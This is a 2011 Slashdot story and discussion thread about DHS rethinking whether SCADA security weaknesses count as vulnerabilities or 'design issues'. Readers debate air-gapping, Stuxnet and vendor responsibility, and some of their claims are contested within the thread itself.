Want to read Slashdot from your mobile device? Point it at m.slashdot.org and keep reading!

 



Forgot your password?
typodupeerror
×
Bug Security IT

SCADA Problems Too Big To Call 'Bugs,' Says DHS 92

chicksdaddy writes "With the one year anniversary of Stuxnet upon us, a senior cybersecurity official at the Department of Homeland Security says the agency is reevaluating whether it makes sense to warn the public about all of the security failings of industrial control system (ICS) and SCADA software used to control the U.S.'s critical infrastructure. DHS says it is rethinking the conditions under which it will use security advisories from ICS-CERT to warn the public about security issues in ICS products. The changes could recast certain kinds of vulnerabilities as 'design issues' rather than a security holes. No surprise: independent ICS experts like Ralph Langner worry that DHS is ducking responsibility for forcing changes that will secure the software used to run the nation's critical infrastructure. 'This radically cuts the amount of vulnerabilities in the ICS space by roughly 90%, since the vast majority of security "issues" we have are not bugs, but design flaws,' Langner writes on his blog. 'So today everybody has gotten much more secure because so many vulnerabilities just disappeared.'"
This discussion has been archived. No new comments can be posted.

SCADA Problems Too Big To Call 'Bugs,' Says DHS

Comments Filter:
  • by elrous0 ( 869638 ) * on Monday September 26, 2011 @03:44PM (#37519900)

    "Bugs," "security vulnerabilities," "design flaws"--really doesn't matter. They can still blow up an Iranian centrifuge. And I'm pretty sure that means they can blow them up in other countries too, along with just about anything else that depends on a PLC. Stuxnet, as well-intentioned as it may have been for Israeli and U.S. interests, was a wake-up call that goes way beyond any petty Persian pissing contest.

    • Re: (Score:3, Insightful)

      by Anonymous Coward

      "Bugs," "security vulnerabilities," "design flaws"

      it matters to beaurocrats, unfortunately.

      the categorization of these flaws, and whether they are a "bug" or not, can determine by law or policy who is on the hook for the $$$ required to fix the flaw.

      • "Bugs," "security vulnerabilities," "design flaws"

        it matters to beaurocrats, unfortunately.

        the categorization of these flaws, and whether they are a "bug" or not, can determine by law or policy who is on the hook for the $$$ required to fix the flaw.

        That's exactly it. (make way for the car analogy!) You wouldn't say that a car with glass windows has a "Security flaw" in which the interior can be accessed through the use of a ball pean hammer and 1/2 lb of force. You instead say that it has known security limitations involving vectors x y and z. If your system (the car) is improperly configured (left unattended in a shitty neighborhood) and subsequently gets burglarized, you would not say that the vendor provided an insufficiently secure car, would y

        • I will sleep better tonight in southern California because my electricity [msn.com] and cell phone [nctimes.com] feel good when their together?

          Or maybe someone at DHS has funny way of doing their job; but how American citizens were helped after Katrina [aclu.org] is something I still clinch my remaining teeth about.
    • Sounds like DHS has hired Dilbert's Pointy Haired Boss.
    • Argh (Score:4, Informative)

      by Anonymous Coward on Monday September 26, 2011 @04:05PM (#37520160)

      We do SCADA systems in the States. We subscribe to several polices regarding SCADA networks:
      1) DO NOT connect your SCADA network to the Internet
      2) if you must connect for remote-access, use a patch cord that you ALWAYS unplug afterward.
      3) DO NOT use your SCADA machines for desktop business purposes - especially on the Internet!
      Argh, the crap that appears in the media. For example, you cannot "infect" a PLC. Why? They don't run Java (or script), or any language recognizable by the Internet community. They don't even run executables, in the sense that PCs do. Their programming is done in a specialized, proprietary language that requires a specialized IDE to manipulate. Write you own? Sure, if you have thousands upon thousands of man-hours handy. Do an open source IDE? Within 24 hours of posting your project somewhere, the manufacturer will be knocking at your door. PLCs are very, very proprietary, and they makers want them to stay that way.
      Stuxnet infected a PC, causing it to change the signals it was sending to motor speed controllers, thus fouling up a process. Which is why you keep your SCADA PCs as far away from the Internet as you possibly can.

      • Re:Argh (Score:4, Informative)

        by elrous0 ( 869638 ) * on Monday September 26, 2011 @04:11PM (#37520206)

        The Iranians had the same policies. Didn't stop Mossad or whoever from putting it on some Russian contractors' thumb drives and infecting them that way. Not so much of a worry unless you're a high value target. But the problem is that a lot of industrial systems ARE pretty high value targets.

      • Re:Argh (Score:4, Interesting)

        by Zerth ( 26112 ) on Monday September 26, 2011 @04:54PM (#37520642)

        For example, you cannot "infect" a PLC. Why? They don't run Java (or script), or any language recognizable by the Internet community. They don't even run executables, in the sense that PCs do. Their programming is done in a specialized, proprietary language that requires a specialized IDE to manipulate.

        PLC IDEs are pirated in the industry all the time(several on TPB right now), so don't expect that to stop anyone outside the industry from writing malicious PLC code, let alone a disgruntled employee who has legitimate access. And anyone who is willing to decompile code taken from a decapped ROM is more than able to buy a broken PLC on ebay and fix it into a testbed.

        Everyone else will just download the exploit from that guy.

      • Re: (Score:2, Interesting)

        by Anonymous Coward

        Mod parent up. As someone who is working in development of SCADA systems at a large company, I tell that every customer I meet. We have it in the manual, we take it into account in projects:
        SCADA systems don't belong on the internet. Not the PLCs, not specialized controllers (motion etc.), not the HMI systems or data loggers either.

        In addition to using a cable you can simply unplug, we would typically recommend a VPN router thing between the SCADA system and the internet (cheap or not so cheap, doesn't real

        • by Renraku ( 518261 )

          Alright, let's give a scenario here. Imagine you're a producer of SCADA/PLC/etc bits. You develop and deploy a solution for a company and after a year of testing and making sure everything is running smoothly, you hand over the keys and do a tactical retreat to let them have their damn system. A lot of money changed hands.

          Then the worst happens. They get hacked. Let's say it breaks down a multi-million dollar piece of equipment. Beyond repair. Has to be scrapped.

          Obviously the fault depends on how it

          • While I very much agree with you, at some point it becomes an arms race. There is no such thing as an unhackable system. But you can minimize risks... We have some clients who run a country wide network because their management "needs" the information at head office. While they go through a VPN, it isn't all that secure. Luckily we are a minor vendor and probably won't get dropped in it..

      • by rev0lt ( 1950662 )
        Many PLC implementations are "open" in the sense that the protocol is open and documented. And while most hi.-power CNC machines aren't vulnerable to internet malware, that doesn't mean that ethernet/serial/can exposed PLC devices aren't. I don't work with PLCs since the late nineties, but I wouldn't be surprised if little to nothing has changed since.
      • by NFN_NLN ( 633283 )

        Funny, you can replace PLC with PS3 and the paragraph still makes sense, except the part about disconnecting from the internet.

        "Argh, the crap that appears in the media. For example, you cannot "infect" a PS3. Why? They don't run Java (or script), or any language recognizable by the Internet community. They don't even run executables, in the sense that PCs do. Their programming is done in a specialized, proprietary language that requires a specialized IDE to manipulate. Write your own? Sure, if you have tho

      • I wish you wouldn't have posted AC then at least I would know which contractor to avoid. Quite frankly your post smells of all the things that cause problems in our industry.

        1) Airgapping isn't a be-all and end all security method. Actually it's typically the way people do security when they couldn't be bothered designing a secure system from the ground up. It's the theory that there's only 2 end points and no need for security that got us Modbus, a protocol with no authentication at all which was ported to

      • by AmiMoJo ( 196126 )

        Actually you can brick many PLCs fairly easily without detailed programming knowledge, using tools downloadable from TPB. Configuration fuses are usually a good place to start, and even if they are not one-time programmable there is usually some combination of settings that causes them to become useless (or cook).

        That is true of many microcontrollers too. Apple tried to prevent those kinds of attack by using cryptography for firmware updates to battery controllers, but the key was accidentally revealed in a

      • >Stuxnet infected a PC, causing it to change the signals it was sending to
        >motor speed controllers, thus fouling up a process. Which is why you keep
        >your SCADA PCs as far away from the Internet as you possibly can.

        Stuxnet actually reprogrammed the PLCs, too. See the analysis at

        http://www.symantec.com/connect/blogs/stuxnet-breakthrough [symantec.com]

    • It all depends on if you understand the design assumptions of the equipment, and how you establish the point of trust. You can build a secure network of insecure components; it is just infinitely more complicated than making a network of secure components. We end up with a bunch of firewalls on RS-485 links that control device-level access, eliminate distributed password management, and need to set up complicated rules for data access. Once someone gets to the RS-485 layer, they are assumed to be trusted

  • by djkitsch ( 576853 ) on Monday September 26, 2011 @03:56PM (#37520040)

    Some extra info popped up online just a few days ago - a SCADA consultant posted this a few days ago. It's slightly terrifying, though someone with more SCADA experience than me would have to verify its accuracy:

    For those who do not know, 747's are big flying Unix hosts. At the time, the engine management system on this particular airline was Solaris based. The patching was well behind and they used telnet as SSH broke the menus and the budget did not extend to fixing this. The engineers could actually access the engine management system of a 747 in route. If issues are noted, they can re-tune the engine in air.

    The issue here is that all that separated the engine control systems and the open network was NAT based filters. There were (and as far as I know this is true today), no extrusion controls. They filter incoming traffic, but all outgoing traffic is allowed. For those who engage in Pen Testing and know what a shoveled shell is... I need not say more.

    More here: https://www.infosecisland.com/blogview/16696-FACT-CHECK-SCADA-Systems-Are-Online-Now.html [infosecisland.com]

    • by LWATCDR ( 28044 )

      Maybe you should not believe everything that you read.
      "Nearly all SCADA systems are online. The addition of a simple NAT device is NOT a control. Most of these systems are horribly patched and some run DOS, Win 95, Win 98 and even old Unixs. Some are on outdated versions of VMS. One I know of is on a Cray and another is on a PDP-11."

      Ummm a SCADA control on a CRAY? Really> Where?
      PDP-11 maybe but a CRAY?
      Also the system you mentioned can not be changed while in flight. Maybe it could be bypassed but then ma

      • by __aaqvdr516 ( 975138 ) on Monday September 26, 2011 @04:30PM (#37520424)

        I can only speak for US Navy Submarines. There are no connections to any reactor systems to any network of any kind.

        • by LWATCDR ( 28044 )

          I was thinking of the other networks. I know that the Virginia class uses a COTS network for a lot of systems. I was using that as an example because lets face it when your down no one is logging into you at all. As you know subs at depth are pretty cut off well SBNs anyway. The can get messages but only at a very slow rate.

          • by Svartalf ( 2997 )

            The only concern there would be that you've got some trojan that was snuck in to the development code. If there's any launch or reactor controls that might get the low-speed comms, you could still do a remote exploit that way.

        • by Svartalf ( 2997 )

          Heh... I'd dearly hope that the electric boats had air-gapped control systems... :-D

        • Re: (Score:2, Insightful)

          And, that is the only sensible approach to take. If the world weren't filled with cheap bastards posing as CEO's and economics experts, there would be a human hand at all critical controls, nationwide. The only networking necessary would be the sound powered phone on the operator's head.

        • by adolf ( 21054 )

          I can only speak for US Navy Submarines. There are no connections to any reactor systems to any network of any kind.

          So the reactor systems are operated by having people manually operate them by turning valves and pulling levers?

          That must be a steampunk's idea of heaven.

          (The above is written with a firm dose of sarcasm. While I'm reasonably sure you meant something very different, "any network of any kind" is literally so broad that it might be construed to include even a mechanical linkage of moderate comp

  • by AtariDatacenter ( 31657 ) on Monday September 26, 2011 @03:58PM (#37520068)

    SCADA? I don't care about. Not directly. But the problem is that once the government says, "These aren't vulnerabilities or security holes. These are design issues." The problem is that you've set the example, and other software vendors are going to follow.

    Example: "The denial of service attack against your application is not a security vulnerability, it is just a design issue that everything locks up for a while if it gets an incoming packet, and tries to resolve the IP address against its authoritative DNS server while that is DNS server is offline. We only do security fixes on old products / old releases. Sorry."

    "Design issue, not a security vulnerability" is not a distinction you want easily drawn. Others will follow a government example if it is an easy out.

    • Re: (Score:2, Interesting)

      by Anonymous Coward

      Trust me, almost everything you have come to depend on in terms of outside resources or outside facilities, directly or indirectly, involves SCADA. Almost. Intelligent cars use unencrypted, unsecure Ethernet connections, often with some form of unsecure wireless connection in there somewhere. That's not SCADA, merely designed just as badly.

      Society is riddled with interdependencies. If you thought Red Hat packages could put you through dependency hell, you've not looked too closely at the systems in the real

    • Personally, I think design flaws is a much more damming claim to make about your product than a bug report. A bug is a low implementation level issue/oversight. A design flaw means your product is rubbish from the ground-up. I would MUCH rather someone say my software had a bud than that there were design issues. I doubt this is going to be a trend that catches-on. The only way I think it could possibly help a company to make such a damming claim would be if it took the words vulnerability or security

    • by maxume ( 22995 )

      Right, because no software vendors ship software with disclaimers to the effect of "This software is unsuitable for any purpose".

      Oh wait, they all do.

      Microsoft doesn't path security vulnerabilities because they are unable to pass them off as design flaws without the help of government, they patch security vulnerabilities because they know they need to or they will face even greater user erosion.

    • We'd rather get back to feeling up 5 year olds and people's Afros rather than address an infrastructure and industries that are highly vulnerable to malicious hacking that could affect the safety and well being of thousands.

      They're so paranoid about 3 oz of liquid -what about industrial controls at a petrochemical or other large chemical plants in which thousands of gallons of chemicals could be blown up or caused to release hazardous materials?

      I'm just sayin'
    • Unfortunately they are right. Much of the industry is based on standards and protocols which were created by one vendor and adopted by others long before the internet reared its ugly head. Many of the fundamental security issues in SCADA systems are failures of design. They aren't bugs because they work 100% as intended.

      When you design protocols which are normally used to communicate between physically secure devices, and then open them up on a network to PCs which are now exposed to the open world (be it v

  • by Anonymous Coward

    Scada systems ,PLC's are a hackers dream.

    It's equipment using protocols of at least 30 years old with no security at all in mind. Furthermore the equipment cannot be turned off or patched or else your factory and/or safety system will no longer work.

    And the worst part is setting everything up, you just leave it be when it finally works...

    I agree that they are design flaws and not bugs. But the industry has to only mentality to have it work, there is no security aspect during the entire process.

    Buyers are no

    • that's because PLC wasn't supposed to be networked; the core code were never designed with security in mind because they are supposed to be programmed and the parked somewhere and never mess with again.

      • by AK Marc ( 707885 )
        And it's a critical design flaw to assume, in today's age, that a large system of networked devices will *never* be connected to any network, ever.
        • chances are that code are recycled from old product to new; ported forward with minute tweaks for the current hardware platform since the management can't see the value of starting from scratch; if anything starting a new is considered a liability.

          • by AK Marc ( 707885 )
            Which is a fundamental problem, whether you want to call it a design problem or a business problem, it isn't a "bug" that managers sat around and specifically decided to make something that they knew was incompatible with the expected use of that product.
  • by dkleinsc ( 563838 ) on Monday September 26, 2011 @04:05PM (#37520158) Homepage

    Making code secure is expensive. When these systems were designed, they were not going to be connected to any outside system, and thus were not designed securely because in order to do anything really bad you'd need to physically access the machine, which meant getting past security guards, cameras, etc without anybody noticing. Nobody could justify the expense of doing things right the first time.

    Then somebody with no technical background comes along and says "Why can't we manage this system from our office desktops?"

    • also how much code is tacked on to older code makeing it so that lot's of hacks and other security holes more likely?

      Now who want's to pay to rewrite the system from the ground up to make it secure or do you want to do it cheap and just patch over the bad design?

    • by AmiMoJo ( 196126 )

      Then somebody with no technical background comes along and says "Why can't we manage this system from our office desktops?"

      It's more like industrial processes moved on, people realised they could increase yields or make something new by having more advanced control systems and so asked for a solution. Not necessarily from the people who supplied the SCADA system either. It came down to a choice between replacing the whole system with one designed for that type of networking and control or just tacking it on to the existing one, and simple economics combined with some vague assurances about physical security won.

  • That isn't a bug, it's a feature. It works that way by design!
  • I use 'design flaw' for bugs that can't be corrected without rewriting the whole code. Software with design flaws are not called 'bug-free', but 'defective by design'.
  • by Runaway1956 ( 1322357 ) on Monday September 26, 2011 @04:43PM (#37520548) Homepage Journal

    When I look at DHS, I can't find a single area in which they are competent. They can't seal the border, they can't ensure that terrorists are denied entry to our aircraft, they can't intercept a terrorist. What in hell CAN they do? Suddenly, they are in the business of issuing cyber security warnings?

    The one and only thing that they MIGHT be able to do correctly, is to tell business to observe best practice advice from the professionals. Beyond that - I expect nothing.

    Oh yeah, if they can grasp the concept, they might push the idea of strict air gapping.

    • by Anonymous Coward

      I wouldn't want DHS to be 100% successful at the "can'ts" in your list. 100% success means sealing the borders and shutting down the airlines. I would want to be able to leave the jail of a nation you are advocating for. We fairly quickly wouldn't have a very large economy if we had no trade after closing the borders. I don't agree with everything DHS does, but usually there is some kernel of logic to the solutions they use. Too many programs are there to make us feel good, not fundamentally improve

      • The point is - we don't even air gap our critical stuff. Joe Sixpack can minimize his porn video over at meattube, log into his control systems, make adjustments, then maximize his meat video again. Iran is the lesson to be learned, but we don't even attempt to learn from it.

        Now, if we properly air gapped all of our infrastructure, then prohibited any USB media, prohibited any floppies (where applicable), AND prohibited all CD/DVD other than official copies issued by competent authority - then we could sa

    • by dbIII ( 701233 )
      They can shovel money around faster than anybody else - it's now just a big pointless welfare operation for those that signed on and too big to be killed off by anyone that wants to continue a political career.
    • When I look at DHS, I can't find a single area in which they are competent. They can't ... . What in hell CAN they do? Suddenly, they are in the business of issuing cyber security warnings?

      They DID, a few years ago, issue a warning to businesses to migrate off Windows and other Microsoft products, due to their security flaws and the resulting vulnerability of the US private-sector infrastructure to attack.

      Of course they managed to hide this warning under a bushel rather than pressure the exectuives to actua

    • DHS is marginally yet effectively competent in advancing Big Brother. While not completely explicit in their charter, I suspect it's the mission, Too much of the rest is standard your-government-loves-you bureaucratic bullshit: building fiefdoms, rice bowls, revolving doors; an employment program for intellectual and moral drones; a new repository of, and for, those with nothing better to do in life than increase their power over others.

      Of course it's also possible that at this late hour my viewpoint is

  • Dear DHS Secretary Janet Napolitano: Please resign. From recent events, it is painfully clear that you do not understand that one of the most fundamental aspects of security is not revealing your methods to the public. This includes telling us whether or not you plan on telling the whole truth about security flaws in the future. The announcement implies two things: 1. Your future comments might not be entirely truthful. 2. DHS's previous comments about cyber security in the past were 100% truthful, to the
    • From recent events, it is painfully clear that you do not understand that one of the most fundamental aspects of security is not revealing your methods to the public.

      Apparently Linus Torvalds does not understand that either.

  • Aren't all bugs just "design flaws"?
    • by AK Marc ( 707885 ) on Monday September 26, 2011 @06:00PM (#37521274)
      If you design a car with a gas tank that dislodges from the filler neck in a crash, spilling fuel in the case of a moderate crash, turning a survivable minor injury crash into a life-threatening incident, then you designed it wrong. If you purposefully design it to keep the filler neck attached for all crashes, but a part sourced for it did not meet specifications, resulting in inadvertent detachment, then you have a "bug" that was most certainly not a design flaw, but a build (coding) flaw.

      One is a purposeful choice to make an inferior product to save time/money. The other is a properly designed product with an unintentional flaw. Sadly, deliberate negligence is tolerated (and seemingly encouraged), while unintended flaws are punished more harshly. But that's government security for you. Appearance is much more important than effect.
    • by tqk ( 413719 )

      Aren't all bugs just "design flaws"?

      Vince?!? WTF are you doing here?!?

      Okay, maybe you're not him, but you sound like him (*Doofus* manager I once worked with). So I feel somewhat obligated to educate you.

      This Waterfall_method [wikipedia.org] says it was first alluded to in 1956 (two years after I was born, fwiw). I only learned about it in the late '80s in programmer school. "Analysis, Design, Implementation, Testing, Maintenance." You're supposed to iterate between them (at any phase you're in when you find a flaw or learn something new, you go back an

  • There, see, you don't have to call it a bug.

    It's still bad and customers still need to be told so they can work the design flaw into their operational plans.

  • It's called an air gap firewall. Don't connect shit to the Internet that has no business being connected to the Internet. This means having strict policies in place, such as "connecting an uncertified wifi-capable laptop to the SCADA network shall result in the violator being shot, repeatedly, in the balls or other sensitive region."

    • It's called an air gap firewall. Don't connect shit to the Internet that has no business being connected to the Internet,

      Not being connected to the Internet didn't keep STUXNET out of Iran's centrifuge SCADA systems. That propagated as a snearkernet virus from consultants' laptops to the machines on the air-gapped networkk which controlled and monitored the PLCs.

      • At least it would make it more difficult. While working on NYC's subways, I found a lot of their SCADA systems were networked into the local station and the overall control center. Which in general is OK, since as of 8 years ago there was no outside connections, but if someone could sneaker-in a virus.... There could be some issues.

  • Seems a fitting time to roll out the old Microsoft joke but with a twist

    How many DHS analysts does it take to change a light bulb ?
    None, because DHS defines darkness as the new standard
  • It is my believe that most vulnerabilities are 'design issues' and not just "security holes" that can be patched over.

    I have been studying OS design now for almost 20 years, I think most of these designs where fine for just trying hack something to work, but now with everything interconnected, they were just never built for that.

    I have an OS design I have been working on for the past 10 years Amorphous OS that is intended to solve almost every issue I've seen talked about.

    Most come from just having a common

  • Design flaws are not bugs. Hmmmm. Maybe if I say it the other way. Bugs are not design flaws. Nope. Still not making sense. Maybe I need to put on a suite and tie.

Do you suffer painful hallucination? -- Don Juan, cited by Carlos Casteneda

Working...